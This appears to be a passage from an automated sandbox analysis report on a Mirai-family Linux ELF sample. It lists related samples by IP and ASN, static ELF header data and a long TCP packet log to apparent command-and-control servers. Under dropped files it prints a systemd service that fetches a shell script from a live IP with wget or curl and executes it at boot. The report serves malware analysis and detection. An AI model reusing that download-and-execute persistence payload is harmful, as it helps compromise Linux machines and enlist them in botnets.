	bot.arm.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	i.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	x86_64.elf	Get hash	malicious	Unknown	Browse
	socat.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	ngwa5.elf	Get hash	malicious	Mirai	Browse
	wrjkngh4.elf	Get hash	malicious	Mirai	Browse
	woega6.elf	Get hash	malicious	Mirai	Browse
	arm5.elf	Get hash	malicious	Mirai	Browse
	arm6.elf	Get hash	malicious	Mirai	Browse
	m68k.elf	Get hash	malicious	Mirai	Browse
	bot.m68k.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tcpdown.su	sparc.elf	Get hash	malicious	Unknown	Browse	45.200.149.95
tcpdown.su	x86_64.elf	Get hash	malicious	Unknown	Browse	45.200.149.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	x86_64.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	socat.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	ngwa5.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	wrjkngh4.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	gnjqwpc.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	woega6.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	arm5.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	arm6.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	m68k.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
Africa-on-Cloud-ASZA	sparc.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	i686.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	x86_64.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	arm.elf	Get hash	malicious	Unknown	Browse	45.200.149.96
	mips.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	arm5.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	mpsl.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	DF2.exe	Get hash	malicious	Unknown	Browse	45.200.148.158
	mpsl.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	mips.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
AS-COLOCROSSINGUS	m68k.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	sparc.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	i686.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	mips.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm5.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	mpsl.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	mpsl.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm.elf	Get hash	malicious	Unknown	Browse	23.94.37.42
INIT7CH	x86_64.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	socat.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	ngwa5.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	wrjkngh4.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	woega6.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	arm5.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	arm6.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	m68k.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	bot.m68k.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/systemd/system/startup_command.service

Download File

Process:	/tmp/i586.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	361
Entropy (8bit):	5.140421405816541
Encrypted:	false
SSDEEP:	6:z8jvIERZAMzdK+KOnFfltZCrXb1vN16R1E/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXpvL6vJ73GLHWrv
MD5:	4D2C868F454B6C55731485CF0F886DC0
SHA1:	032B125DE0A28DCEE8D8D25FBEEB56DB7F403F04
SHA-256:	8C4AE1B82477698F3A8C273B439CB9079794AFB8FC33CD4DEF854936BA37EA2C
SHA-512:	060B2413A0CB2DEC0DB059C190467B5CB0D76209EFFEA4AE3DE2701FA71429B811A6F7E11E813B26806CF72578D1F32B608A02A4CE670EC58B5B65433E3CF11D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.18.192/auto.sh \|\| busybox wget http://154.216.18.192/auto.sh \|\| curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.283721160763472
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	i586.elf
File size:	70'796 bytes
MD5:	a4308d0cf09d2f1bc259627e7b91252d
SHA1:	4884f55dd9bf34015caab7ec130546fa9cb84a93
SHA256:	cfd0be6379b1a3b95bfe58c8e724f246646fa07d94ab186f611f4d7b5e8e557c
SHA512:	232a234d46787f2144de58b4ddf7cdd650b42173e01847bad4270a400ee445fb51cbf924e03093b8028c48a42c97c42e6e8cf7585506162ade2036b29e6f110f
SSDEEP:	1536:yPQsRePYB4WZhMXaH96kOE1BqLoq19W1vlPmNta:yPtMPYB4WZhMXo1mLoq9+doI
TLSH:	2A634AC5A643E8F5EC2616702133E7374772F03E112EDA87C765D932ACA6940EA1739C
File Content Preview:	.ELF....................d...4...........4. ...(.....................\...\...........................................Q.td............................U..S.......w....h........[]...$.............U......=.....t..5....$......$.......u........t....h\...........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	70396
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0xe0a6	0x0	0x6	AX	16
.fini	PROGBITS	0x8056156	0xe156	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x8056180	0xe180	0x2cdc	0x0	0x2	A	32
.ctors	PROGBITS	0x8059000	0x11000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x8059008	0x11008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x8059020	0x11020	0x29c	0x0	0x3	WA	32
.bss	NOBITS	0x80592c0	0x112bc	0xeb00	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x112bc	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x10e5c	0x10e5c	6.3368	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0x11000	0x8059000	0x8059000	0x2bc	0xedc0	3.6179	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 08:51:49.106075048 CET	43928	443	192.168.2.23	91.189.91.42
Jan 2, 2025 08:51:49.298861027 CET	43508	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:51:49.303997993 CET	2601	43508	45.200.149.167	192.168.2.23
Jan 2, 2025 08:51:49.304053068 CET	43508	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:51:49.304065943 CET	43508	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:51:49.308861017 CET	2601	43508	45.200.149.167	192.168.2.23
Jan 2, 2025 08:51:49.308903933 CET	43508	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:51:49.313713074 CET	2601	43508	45.200.149.167	192.168.2.23
Jan 2, 2025 08:51:50.187289953 CET	2601	43508	45.200.149.167	192.168.2.23
Jan 2, 2025 08:51:50.187351942 CET	43508	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:51:50.187402010 CET	43508	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:51:54.737268925 CET	42836	443	192.168.2.23	91.189.91.43
Jan 2, 2025 08:51:55.862349987 CET	57092	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.867424965 CET	7722	57092	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:55.867500067 CET	57092	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.867500067 CET	57092	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.867542982 CET	57092	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.872463942 CET	7722	57092	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:55.894398928 CET	57094	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.899293900 CET	7722	57094	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:55.899368048 CET	57094	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.901097059 CET	57094	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.901097059 CET	57094	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:55.905915976 CET	7722	57094	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:55.914520025 CET	7722	57092	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:55.950551987 CET	7722	57094	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.017091990 CET	42516	80	192.168.2.23	109.202.202.202
Jan 2, 2025 08:51:56.057523966 CET	57096	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.062572956 CET	7722	57096	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.062633991 CET	57096	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.062658072 CET	57096	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.062668085 CET	57096	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.067600965 CET	7722	57096	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.114681959 CET	7722	57096	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.130392075 CET	57098	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.135328054 CET	7722	57098	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.135373116 CET	57098	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.135385990 CET	57098	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.135400057 CET	57098	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.140242100 CET	7722	57098	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.182615042 CET	7722	57098	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.242235899 CET	7722	57092	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.242307901 CET	57092	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.266830921 CET	7722	57094	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.266916037 CET	57094	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.433840990 CET	7722	57096	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.433923006 CET	57096	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:56.518768072 CET	7722	57098	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:56.518855095 CET	57098	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:59.047591925 CET	57100	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:59.052567959 CET	7722	57100	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:59.052669048 CET	57100	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:59.052669048 CET	57100	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:59.052710056 CET	57100	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:51:59.057439089 CET	7722	57100	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:59.098546028 CET	7722	57100	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:59.418195963 CET	7722	57100	107.175.130.16	192.168.2.23
Jan 2, 2025 08:51:59.418262959 CET	57100	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.344063997 CET	57102	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.348880053 CET	7722	57102	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.348937988 CET	57102	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.348937988 CET	57102	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.348953009 CET	57102	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.353818893 CET	7722	57102	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.376921892 CET	57104	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.381711006 CET	7722	57104	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.381823063 CET	57104	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.381849051 CET	57104	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.381866932 CET	57104	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.386648893 CET	7722	57104	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.398464918 CET	7722	57102	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.410999060 CET	57106	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.415894032 CET	7722	57106	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.415951967 CET	57106	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.415985107 CET	57106	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.415999889 CET	57106	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.420758009 CET	7722	57106	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.430632114 CET	7722	57104	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.466552973 CET	7722	57106	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.721684933 CET	7722	57102	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.721759081 CET	57102	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.757220030 CET	7722	57104	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.757298946 CET	57104	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:00.796736956 CET	7722	57106	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:00.796854973 CET	57106	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.238614082 CET	57108	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.243551970 CET	7722	57108	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.243644953 CET	57108	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.243644953 CET	57108	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.243644953 CET	57108	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.248028994 CET	57110	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.248505116 CET	7722	57108	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.252963066 CET	7722	57110	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.253025055 CET	57110	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.253025055 CET	57110	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.253065109 CET	57110	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.257838011 CET	7722	57110	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.290608883 CET	7722	57108	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.298455954 CET	7722	57110	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.615026951 CET	7722	57108	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.615108967 CET	57108	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:05.617389917 CET	7722	57110	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:05.617451906 CET	57110	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.331567049 CET	57112	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.334500074 CET	57114	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.336579084 CET	7722	57112	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.336643934 CET	57112	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.336663008 CET	57112	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.336673975 CET	57112	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.339320898 CET	7722	57114	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.339376926 CET	57114	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.340564966 CET	57114	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.340564966 CET	57114	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.341494083 CET	7722	57112	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.345377922 CET	7722	57114	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.382463932 CET	7722	57112	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.386487007 CET	7722	57114	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.723722935 CET	7722	57112	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.723793030 CET	57112	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.730659008 CET	7722	57114	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:10.730706930 CET	57114	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:10.863044024 CET	43928	443	192.168.2.23	91.189.91.42
Jan 2, 2025 08:52:15.300817013 CET	57116	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.305608988 CET	7722	57116	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.305675983 CET	57116	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.305689096 CET	57116	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.305696964 CET	57116	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.308228016 CET	57118	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.310431957 CET	7722	57116	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.313044071 CET	7722	57118	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.313093901 CET	57118	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.313110113 CET	57118	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.313118935 CET	57118	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.317883015 CET	7722	57118	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.358479977 CET	7722	57116	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.358491898 CET	7722	57118	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.669922113 CET	7722	57116	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.669977903 CET	57116	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:15.698019028 CET	7722	57118	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:15.698067904 CET	57118	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:16.274756908 CET	43538	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:16.820056915 CET	2601	43538	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:16.820235014 CET	43538	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:16.820235014 CET	43538	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:16.824990034 CET	2601	43538	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:16.825098038 CET	43538	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:16.829837084 CET	2601	43538	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:17.670984030 CET	2601	43538	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:17.671047926 CET	43538	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:17.671093941 CET	43538	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:20.340445995 CET	57122	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.345365047 CET	7722	57122	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.345437050 CET	57122	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.345452070 CET	57122	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.345460892 CET	57122	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.350266933 CET	7722	57122	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.390475988 CET	7722	57122	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.398736954 CET	57124	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.403673887 CET	7722	57124	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.403729916 CET	57124	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.403750896 CET	57124	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.403780937 CET	57124	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.408514977 CET	7722	57124	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.450489998 CET	7722	57124	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.725557089 CET	7722	57122	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.725630045 CET	57122	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:20.798811913 CET	7722	57124	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:20.798904896 CET	57124	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:21.101613998 CET	42836	443	192.168.2.23	91.189.91.43
Jan 2, 2025 08:52:26.765924931 CET	57126	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:26.770843029 CET	7722	57126	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:26.770915031 CET	57126	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:26.770931959 CET	57126	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:26.770931959 CET	57126	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:26.775782108 CET	7722	57126	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:26.822501898 CET	7722	57126	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:27.158349991 CET	7722	57126	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:27.158427000 CET	57126	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:27.244760036 CET	42516	80	192.168.2.23	109.202.202.202
Jan 2, 2025 08:52:28.721616030 CET	57128	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:28.726567030 CET	7722	57128	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:28.726640940 CET	57128	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:28.726656914 CET	57128	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:28.726675987 CET	57128	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:28.731496096 CET	7722	57128	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:28.774516106 CET	7722	57128	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:29.103141069 CET	7722	57128	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:29.103239059 CET	57128	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.168708086 CET	57130	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.177679062 CET	57132	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.301738024 CET	7722	57130	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.301753998 CET	7722	57132	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.301820040 CET	57130	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.301832914 CET	57132	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.301848888 CET	57130	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.301857948 CET	57130	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.301871061 CET	57132	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.301871061 CET	57132	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.306746006 CET	7722	57130	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.306756020 CET	7722	57132	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.350445986 CET	7722	57132	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.350646019 CET	7722	57130	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.674808979 CET	7722	57130	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.674885988 CET	57130	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:35.687427998 CET	7722	57132	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:35.687503099 CET	57132	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.175335884 CET	57134	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.178227901 CET	57136	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.180258989 CET	7722	57134	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.180314064 CET	57134	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.180341959 CET	57134	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.180341959 CET	57134	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.183109999 CET	7722	57136	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.183177948 CET	57136	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.185177088 CET	7722	57134	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.185767889 CET	57136	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.185767889 CET	57136	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.190535069 CET	7722	57136	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.230453968 CET	7722	57134	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.238534927 CET	7722	57136	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.549029112 CET	7722	57134	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.549120903 CET	57134	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:40.562069893 CET	7722	57136	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:40.562320948 CET	57136	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:43.734134912 CET	57138	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:43.734797001 CET	43558	2601	192.168.2.23	45.200.149.167
Jan 2, 2025 08:52:43.738970995 CET	7722	57138	107.175.130.16	192.168.2.23
Jan 2, 2025 08:52:43.739038944 CET	57138	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:43.739052057 CET	57138	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:43.739074945 CET	57138	7722	192.168.2.23	107.175.130.16
Jan 2, 2025 08:52:43.739690065 CET	2601	43558	45.200.149.167	192.168.2.23
Jan 2, 2025 08:52:43.739792109 CET	43558	2601	192.168.2.23	45.200.149.167
